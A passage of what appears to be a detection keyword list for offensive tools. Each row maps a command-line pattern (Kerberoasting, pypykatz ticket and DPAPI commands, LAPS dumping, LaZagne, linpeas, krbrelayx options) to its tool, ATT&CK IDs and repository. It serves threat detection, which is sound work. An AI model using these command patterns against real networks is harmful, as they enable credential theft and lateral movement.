Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* kerberoast /spn:*,offensive_tool_keyword,nanorobeus,COFF file (BOF) for managing Kerberos tickets.,T1558.003 - T1208,TA0006 - TA0007,N/A,N/A,C2,https://github.com/wavvs/nanorobeus,1,0,N/A,10,10,234,28,2023-07-02T12:56:27Z,2022-07-04T00:33:30Z -* Kerberoastables.txt*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* --kerberoasting *,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -* kerberos asreproast *,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* kerberos brute * -d *,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* kerberos brute *.txt*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - 
T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* kerberos ccache del *.ccache*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* kerberos ccache exportkirbi *,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* kerberos ccache list *.ccache*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* kerberos ccache loadkirbi *,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* kerberos ccache roast *,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* kerberos keytab *.keytab*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* kerberos kirbi parse *,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - 
TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* kerberos spnroast *,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* kerberos tgt *kerberos+rc4://*:*@*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* kerberos.py*,offensive_tool_keyword,crackmapexec,protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* --key examples/conspicuous.priv --isconspicuous*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* --key PPLBlade*,offensive_tool_keyword,PPLBlade,Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.,T1003.001 - T1027.004 - T1560.001 - T1039 - T1570,TA0006 - TA0005 - TA0010 - TA0003,N/A,N/A,Credential Access - Data Exfiltration,https://github.com/tastypepperoni/PPLBlade,1,0,N/A,10,4,324,36,2023-08-30T07:59:51Z,2023-08-29T19:36:04Z -* keylogger *,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,0,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -* --keyword * --check --ocr * --alexa*,offensive_tool_keyword,domainhunter,Checks expired domains for categorization/reputation and Archive.org history to determine good candidates for phishing and C2 domain names ,T1583.002 - T1568.002,TA0011 - TA0009,N/A,N/A,Phishing,https://github.com/threatexpress/domainhunter,1,0,N/A,N/A,10,1380,291,2022-10-26T03:15:13Z,2017-03-01T11:16:26Z -* -KillDate *,offensive_tool_keyword,empire,empire agent.ps1 arguments.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1063,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* -KillDays *,offensive_tool_keyword,empire,empire agent.ps1 arguments.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1064,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* kimi.py *,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,0,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -* KittyStager*,offensive_tool_keyword,KittyStager,KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. 
The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.,T1021.002 - T1055.012 - T1105,TA0005 - TA0008 - TA0011,N/A,N/A,C2,https://github.com/Enelg52/KittyStager,1,0,N/A,10,10,175,34,2023-06-06T11:38:39Z,2022-10-10T11:31:23Z -* klist * /service:*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* knx-gateway-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* knx-gateway-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* KRB hijacking module *,offensive_tool_keyword,krbjack,A Kerberos AP-REQ hijacking tool with DNS unsecure updates abuse.,T1558.002 - T1552.004 - T1048.005,TA0006 - TA0007 ,N/A,N/A,Sniffing & Spoofing,https://github.com/almandin/krbjack,1,0,N/A,10,1,73,13,2023-05-21T15:00:07Z,2023-04-16T10:44:55Z -* krb5-enum-users.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* --krbpass * --krbsalt * -t * --escalate-user *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* --krbpass *--krbsalt*,offensive_tool_keyword,krbrelayx,Kerberos unconstrained delegation abuse toolkit,T1558.003 - T1098,TA0004 - TA0006,N/A,N/A,Exploitation Tools,https://github.com/dirkjanm/krbrelayx,1,0,N/A,N/A,2,900,148,2023-09-07T20:11:36Z,2019-01-08T18:42:07Z -* KRBUACBypass*,offensive_tool_keyword,KRBUACBypass,UAC Bypass By Abusing Kerberos Tickets,T1548.002 - T1558 - T1558.003,TA0004 - TA0006,N/A,N/A,Defense Evasion,https://github.com/wh0amitz/KRBUACBypass,1,0,N/A,8,5,402,52,2023-08-10T02:51:59Z,2023-07-27T12:08:12Z -* -l nmapRssuilt.xml 
-v*,offensive_tool_keyword,scan4all,Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty,T1046 - T1210.001 - T1059 - T1082 - T1110,TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011,N/A,N/A,Exploitation tools,https://github.com/hktalent/scan4all,1,0,N/A,10,10,4019,483,2023-09-30T05:33:44Z,2022-06-20T03:11:08Z -* Ladon.ps1*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -* Ladon.py*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -* Lalin.sh*,offensive_tool_keyword,LALIN,this script automatically install any package for pentest with uptodate tools . and lazy command for run the tools like lazynmap . 
install another and update to new,T1588,N/A,N/A,N/A,Exploitation tools,https://github.com/screetsec/LALIN,1,0,N/A,N/A,4,350,164,2017-04-13T13:47:21Z,2016-06-10T07:53:49Z -* laps.py *--ldapserver*,offensive_tool_keyword,LAPSDumper,Dumping LAPS from Python,T1136.001 - T1112 - T1078.001,TA0002 - TA0004 - TA0005,N/A,N/A,Credential Access,https://github.com/n00py/LAPSDumper,1,0,N/A,10,3,222,34,2022-12-07T18:35:28Z,2020-12-19T05:15:10Z -* laps.py *-u * -p *,offensive_tool_keyword,LAPSDumper,Dumping LAPS from Python,T1136.001 - T1112 - T1078.001,TA0002 - TA0004 - TA0005,N/A,N/A,Credential Access,https://github.com/n00py/LAPSDumper,1,0,N/A,10,3,222,34,2022-12-07T18:35:28Z,2020-12-19T05:15:10Z -* laZagne.py*,offensive_tool_keyword,LaZagne,The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.,T1552 - T1003 - T1555,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/AlessandroZ/LaZagne,1,0,N/A,10,10,8527,1980,2023-08-12T12:38:22Z,2015-02-16T14:10:02Z -* lazypariah*,offensive_tool_keyword,LAZYPARIAH,LAZYPARIAH - A Tool For Generating Reverse Shell Payloads On The Fly,T1059 - T1566 - T1212 - T1574,TA0002 - TA0003 - TA0008,N/A,N/A,POST Exploitation tools,https://github.com/octetsplicer/LAZYPARIAH,1,0,N/A,N/A,2,136,30,2022-06-18T08:59:45Z,2020-11-20T05:08:36Z -* ldap * --gmsa *dump*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -* ldap * 
--trusted-for-delegation*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -* ldap * -u * -p * --admin-count*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -* ldap * -u * -p * -M whoami *,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -* ldap-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ldap-novell-getpass.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ldap-rootdse.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ldap-search.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* --ldapusername * --ldappassword *,offensive_tool_keyword,sharphound,C# Data Collector for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/SharpHound,1,0,N/A,N/A,5,440,124,2023-09-28T19:43:14Z,2021-07-12T17:07:04Z -* ldeep_dump *,offensive_tool_keyword,ldeep,In-depth ldap enumeration utility,T1589 T1590 T1591,N/A,N/A,N/A,Reconnaissance,https://github.com/franc-pentest/ldeep,1,0,N/A,N/A,3,219,26,2023-10-02T20:36:02Z,2018-10-22T18:21:44Z -* lexmark-config.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* linpeas.sh *,offensive_tool_keyword,PEASS,PEASS - Privilege Escalation Awesome Scripts SUITE,T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002,TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/carlospolop/PEASS-ng,1,0,N/A,N/A,10,13375,2820,2023-10-02T22:12:50Z,2019-01-13T19:58:24Z -* linpeas.sh*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* -linpeas=http://127.0.0.1/linpeas.sh*,offensive_tool_keyword,PEASS,PEASS - Privilege Escalation Awesome Scripts SUITE,T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002,TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/carlospolop/PEASS-ng,1,0,N/A,N/A,10,13375,2820,2023-10-02T22:12:50Z,2019-01-13T19:58:24Z -* linWinPwn*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -* --list=hidden-options*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential 
Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -* --list-payloads*,offensive_tool_keyword,GreatSCT,The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.,T1055 - T1112 - T1189 - T1205,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/GreatSCT/GreatSCT,1,0,N/A,N/A,10,1103,214,2021-02-10T22:05:27Z,2017-05-12T03:30:41Z -* live dpapi blobfile *.blob*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* live dpapi cred *,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* live dpapi keys -o *,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* live dpapi securestring *,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* live dpapi vcred *,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* live dpapi vpol *,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 
